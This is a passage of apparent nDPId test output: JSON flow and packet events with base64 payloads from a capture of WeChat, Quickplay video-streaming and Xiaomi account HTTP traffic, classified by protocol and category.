NhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCoZfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwC5BQICxN0BAmqbBe97kd9DUUv3xZ4Sxtk="} -00840{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052348,"flow_last_seen":1429000052348,"flow_idle_time":7440000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":1429000052348,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42761,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmbatchemojidownload","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01001{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":461,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":461,"pkt_l4_len":425,"thread_ts_msec":1429000052350,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAb2qTEAAPwZ4UAo2qfrLzZeg1mUAUE+SeI3XHwqaUBgAbsqdAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vZ2V0Y29udGFjdGxhYmVsbGlzdCBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDEzMA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNColfJgEAQVUr0H3fAhACF0hkbD5sDN+EgwD\/BNABUsTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYeQoz6VrtJH00pu+gvbU58lmESj2o4D7TnERbmXXALCqM="} 
-00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052350,"flow_last_seen":1429000052350,"flow_idle_time":7440000,"flow_min_l4_payload_len":405,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":405,"midstream":1,"thread_ts_msec":1429000052350,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/getcontactlabellist","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1429000052688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000052688,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPWIBEAArAZEf8vNgWUKNqn6AFCnCZFyi8YwPunGUBgIIppgAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwC5BQwMAADES8+zVe2SBL6tUVxA2Vh6"} 
-00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1429000053611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000053611,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYEAArQar6MvNl6AKNqn6AFDWZdcfCppPknoiUBgIIrzYAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} -02362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1429000054555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000054555,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaBrnEAArQYNK3gcIygKNqn6AFDLKctRyGZwAbOjUBAIIjnpAAC6eiaRjUv\/RPkOH82F5WosK669TTY41gIXUb5TM31DDCidAN9BA2XuM3HL8T4H8RaooiwzYVX\/NyYQvgJwozgBs+HWQERJo3j\/tFsg+NsbehQ2yqZ0ni5IF772nmOTUjjTqhvSyTYKL8LPX7\/SbJuUeesyVlCo1rcZrFyvobivL2QselZVKbZT9oXnVrTBXz9SgWOBGQjqM+6MYkHQqsKJwKvUzEiyfqsG7Y5ib\/HG3Cr61CWCOUzckjCo4x7\/2FXuS4bbTxyKoEXBeNcTCujBm4BW7TCl6yaZq2WXxGG4hvRF0Be\/m5kDX7D2ritov06P2eBHlozi8poVm+8iR+ps7ttJSDR9cRtIoZ6CzGQuMlpslQH3eGbKiA+TieQa5VKgPmn67A5ZHz6oVTfujJs8WKbjDDZ9Q0iRvNel4W1E1K\/\/zSVXoGcUMXf+jhnQwZpcpi1EdAnR+40BHozU+RTudhZL4Gple7Zf9xhKfQFyWOsUn76k3fkX1zxQlXwkMtX73RmtTyaB3L2pN7AlVM\/\/nWHu7EuLuT9DL9C5g0C9ndUmqL7NBsK0kAZZ78eDPfrNcCw\/ZFw2bNcbUFc\/DZYsLjg+otfm91LhV9Jp43mlKbIVnnDPmIDKMqjiCMwbTaSaZixrFny1uf5O00Y6dqEgtz9Pli4PyDpRhyoCvJu+i4H+d88Uaw2rkO46JoXyB7A5p5OjjhlkqrGyi1CwU0deobjNdyyDdV8jJ\/Pi9n3PsmZZgmuJXbUr3Wj33YeDG\/0Oj+2II0vRU4R2CM
hv6eJcxCNdiNxlxN6WMj7SN4Xwx9cQTGloH0v9P+ZbhisAixQQx+c7VnS53a6eMHAGjtfp5Vfl\/a+fbz\/SS6+0wsbw43YigcJZdKwu\/J+7R2Vsvwwp\/\/0VJXCclXCvQKK9ZgSyMjcZXFFdVBYQ9ynX2PKUJbCiQo0ZSacbctiB0eo38ldIKG1HQXiG+IvrS8x51f+MHkxe\/Qz6gFVONzxqGI2AuPK799Gz1u48EzIlwqf+hfJ5+80+67LPm7OKnX\/+Hglw20t2bXScSU\/7a\/No7LXMZaiPPFjItOLkydDIZdblKbD9VzRcriDGIikYRE2vOO7ef0bABx9ekxq7Y6qOz8wz2bfi82kKdO6ZKos8mJ6Z5zMskbhz5TARjuFwb\/y0CNvNRI3ZzaCcWvcSerQm6YI5Qkh9hi+UFoCigmvOa40ltrSAgZJLwEzoigbbL\/Fux90aNws71lhYIk5rLapLHllGTYci4NeZq+lysN0NJeGSVgJjhywSjEcv98KS01SOoGP+L8hkrHHDndozayAIZx7KNatPdBhHierZx9hk7YaR2QyAaOf\/KGZ26mtXJD+fZ9qzzRf7VPOJIXRan6Mvh2X5ksvc+d2E+xpW4ZS3heqwr3GFyseSzu+SItPTkyOePTh5SBKlnurq4GBXzKzTiVp1gCObUjjb361kLXFDG8pv8RFHz9T71D1Nc2wSTzFugnvV1UNFiSfCUv5Hf3vreasQSxEc5M2HufON7Ls2Sq1av0HxiKW3cr3g1hTf6isQpBvLi2kzfVTuUfjZ4NfuituEBPk76dM0NGhwCE37DhDWyEA0CskC\/3LGpzpkwJVXZJneb4tZ6ZUUp9Tq8jwnKJrc9Xm0\/K+NOqhD9cfXeA0wPmIBqb\/50HOtK0ivaxJQrriFNfYzXGvwDWExqj3032B+UnoRZ9sdl+HDci1tJl2ZYTWQ\/jnW4QU+eyZsftpA1fidaKNXFUm98r6LCSgwEpKQko1ga3+vGDjVtQbFJqqZZSUhMiGE7JxSiWQR6m1VFOyrIP\/NGSlhQwEVU0AVlSc0flRUDOO1ef3Q8CCp+aj8TUh3wwIIfQUflA=="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-01212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":616,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":616,"pkt_l4_len":580,"thread_ts_msec":1429000054595,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAljROkAAPwZnAgo2qfrLzYFlpwoAUAw7AlWKyQifUBgAbo2ZAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vYW5kcm9pZGdjbXJlZyBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDI5MQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCo1fJgEAQVUr0H3fAhACF0hkbD5sDN+EgwDvBPUC9wHE3QEChNVx4ZIME2Cf+At3im0FbHQtQ5OeVwRjPIiyLiTcUNpigxgohLu4Sn2cUUhjM\/e6hatoyLaBnD1MiX1aSCFGHqc7sd1LbQ4Ji50\/nmut+cRtfu64v\/XpBgMs3P9k27B87PKWuZeRn0c7PoUNWA2a8JliIiEG\/iNlGYYh7Jh9YEWG\/gDJeOxQbfTuL3jKYttVpQbSW5W7M23rsRNXzMxlPjm7V+eiXogw4ZTrI0SYQBetGJTy4I9tf1xmHMyE6HsFYIlHFXzsGgJQf7uh78Qo0Kz+t0syWOECVQvp3s423G3nllPk9jmdcOLrj5HgsV0zUjYpYNBzzWvoRGUwiRoLkw=="} -00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7440000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": 
{"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/androidgcmreg","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1429000054688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000054688,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjvEAAPwaG4wo2qfp4HCMoyykAUHABs6PLUc5cUBgk\/ZRuAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} -00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1429000054967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000054967,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUEEkAArQbHccvNgWUKNqn6AFCnCorJCJ8MOwSFUBgII8UCAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDvBAYGAAAXudj2eCNNjv4Uv\/n42\/lx"} 
-00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1429000055158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000055158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYkAArAas5svNl6AKNqn6AFDWZdcfCppPknoiUBkIIrzXAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} -01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
-00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":681,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":681,"pkt_l4_len":645,"thread_ts_msec":1429000110390,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAApm620AAPwZqrgo2qfrLzZPXi1YAUBkYU+pems3wUBgAbqLPAABQT1NUIGh0dHA6Ly9oa21pbm9yc2hvcnQud2VpeGluLnFxLmNvbS9jZ2ktYmluL21pY3JvbXNnLWJpbi9ydGt2cmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMzU1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGttaW5vcnNob3J0LndlaXhpbi5xcS5jb20NClVzZXItQWdlbnQ6IE1pY3JvTWVzc2VuZ2VyIENsaWVudA0KDQqNXyYBAEFVK9B93wIQAhdIZGw+bAzfhIMAzAXaBLgCxN0BAsPj4k0n0ICdjYK52ViOWnOC4Vzgxi7+iegOsMW+oW6QdEAHg+UlyxaSBb9\/s0oeR4gum6gk+uWhqjv3Tkoz3jpOxZ3uqg5IoeAevVK78mE+75Mm5QEXaL\/24wa8I4nsiJTVEr54yg9WsIjA1I\/cd65YM57jS4+t1kJ\/xpqwwPsMfqK2G34N85Xo0uWP1F2PyLEjHiJZyK4xRu\/XYVzahdDn1vQRPtqQ3i2o6ggKNGN3kBkFa6C2GO0zTqwt7XUYqb0ppGq3KKIyPCtrTg5YICuEsfTDMTLer3J067M5VD93Ij+RkxqqGFN9+gvu+C\/smM0OksnEYsvtVnkr65ZF5Pk4qVPYHRDIlRcRHe0XzckIkJitYHFr8VSN2R6GxFfZK0YtMPQdmLxH6qLecheL3Cuuz7XcYpBc6JGpDIih+q4v"} 
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7440000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} -00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1429000110528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":262,"pkt_l4_len":226,"thread_ts_msec":1429000110528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPYrhEAArQaNjMvNk9cKNqn6AFCLVl6azfAZGFZbUBgIKKjyAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ4DQoNCoJfAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDMBQYGAIBAF7nY9ngjTY7+FL\/5+Nv5cQ=="} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":638,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":638,"pkt_l4_len":602,"thread_ts_msec":1429000117728,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAm69YkAAPwYFAwo2qfo2s4xB3D0AUJYYUVzgorreUBgAc7mmAABHRVQgL3Bhc3MvdjIvc2FmZS91c2VyL2NvcmVJbmZvP3NpZ25hdHVyZT11JTJGNzNkRVhCSGJlamV2MElTTnduR3l5ZmVUdyUzRCZ1c2VySWQ9TXo1WHI1VVhLdXc4M2h4ZDZZbXMydyUzRCUzRCBIVFRQLzEuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvb2tpZTogY1VzZXJJZD1SbmVTNDhuLWRZX1ZlMllKU3NWLXF0RUxvOG87IHNlcnZpY2VUb2tlbj1qYWl5azdjUlQ0WDI0RWp3eENnQUxHOEFJdk9pWmNWTFU1cCsyaW9HSzVaK1MrWDFLbkJwOHBGUDJIV3FhVFJEWHU1eUY3YjZqaDdYdDQxZTZZOXYyUVRGN2tnbUhrSjBhSXJ0Sm9iOTBaZ2lBMy8rYlZQWXBrcVM3ajhUREorNEo3Rkt3VzFsZDZCWSswakU4SncxbGYrTVE0OEVUQmlOc01FbEthUGh2MEREOVZvUlMxNXRVM2dSMHlmVEcxWHMNClVzZXItQWdlbnQ6IERhbHZpay8xLjYuMCAoTGludXg7IFU7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIE1JVUkvVjYuNC4yLjAuS1hETUlDQikNCkhvc3Q6IGFwaS5hY2NvdW50LnhpYW9taS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
-00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7440000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -01505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1429000118045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":831,"pkt_l4_len":795,"thread_ts_msec":1429000118045,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAy+57kAArQaZmTazjEEKNqn6AFDcPeCiut6WGFOiUBgIJVI5AABIVFRQLzEuMSAyMDAgT0sNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpEYXRlOiBUdWUsIDE0IEFwciAyMDE1IDA4OjI4OjM3IEdNVA0KU2VydmVyOiBUZW5naW5lLzIuMC4xDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD11dGYtOA0KQ29udGVudC1MZW5ndGg6IDU1Ng0KDQofiwgAAAAAAAADBMHXokMwAADQD+pDVCuuR7VCzdrerESNxijK199zgLVnYggNE5ULioIZGP6CKSQ+J1Ue9LQPP\/PeL9xYw3Gkgs8aCeFd\/zZqCdqbSs4SDagv3Q8gbXJOLHNZZfmdTsJ6vPDYpe+\/rdailf+Vy4WCt5JCSfPLvLm\/VjBPjj45GMX6eUks60t+xxt21vhZm+cZaqa7DoZ7yob2ejBdIHAVjR1TTdJhFubG5KBya8nY0zzMWLsuzvCvt9glIynGQHg+BLRZzPC8ZTGPUy
